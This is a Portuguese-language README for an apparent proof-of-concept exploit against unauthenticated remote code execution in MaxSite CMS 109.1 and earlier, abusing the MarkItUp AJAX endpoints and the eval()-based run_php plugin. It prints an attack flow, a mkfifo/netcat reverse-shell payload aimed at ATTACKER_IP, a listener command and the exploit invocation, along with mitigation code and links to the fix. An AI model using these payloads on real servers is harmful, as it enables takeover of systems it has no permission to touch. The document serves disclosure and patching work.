
Prova de conceito de exploit para execução remota de código não autenticada no MaxSite CMS <= 109.1 por meio de endpoints AJAX do editor MarkItUp, com payloads de detecção e reverse shell.
Vulnerabilidade de Execução Remota de Código (RCE) Não Autenticada no MaxSite CMS ≤ 109.1.
A falha decorre de verificações de autorização fracas nos endpoints AJAX do plugin do editor MarkItUp, combinadas com a execução insegura de código PHP fornecido pelo usuário pelo plugin run_php.
A vulnerabilidade afeta os seguintes arquivos no plugin do editor MarkItUp:
preview-ajax.phpautosave-post-ajax.phpEsses endpoints:
run_php[php]...[/php] usando eval()Um atacante pode enviar uma solicitação POST manipulada para a rota /ajax/ contendo um caminho interno codificado em Base64 e um payload PHP malicioso por meio do parâmetro data, resultando em:
graph TD
A["Attacker"] -->|"Malicious POST Request"| B["AJAX Endpoint"]
B -->|"Referer Spoofing"| C["preview-ajax.php"]
C -->|"Unsanitized Input"| D["run_php Plugin"]
D -->|"eval() Execution"| E["Arbitrary PHP Execution"]
E -->|"Command Execution"| F["Compromised Server"]
run_php habilitado (padrão comum)eval()Um exploit de prova de conceito em Python 3 (exploit.py) está incluído.
[php]echo 'RCE CONFIRMED - ' . phpversion();[/php]
[php]system('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP ATTACKER_PORT >/tmp/f');[/php]
nc -lvnp 9001
python3 exploit.py http://target.com --lhost 10.10.14.22 --lport 9001
run_php se não for necessárioAdicione verificações de autenticação aos arquivos vulneráveis:
if (!is_login()) {
die('Access denied');
}
mso_checkreferer();
Commit da Correção https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3
Entrada da Vulnerabilidade https://vuldb.com/?id.348281
Registro NVD https://nvd.nist.gov/vuln/detail/CVE-2026-3395
Este projeto é fornecido para:
⚠️ Não use contra sistemas sem permissão explícita.
O autor não assume responsabilidade por uso indevido ou danos.
Mohammed Idrees Banyamer Jordânia 🇯🇴 Pesquisador de Segurança
banyamer_security — Silent Hunter • Shadow Presence
Março de 2026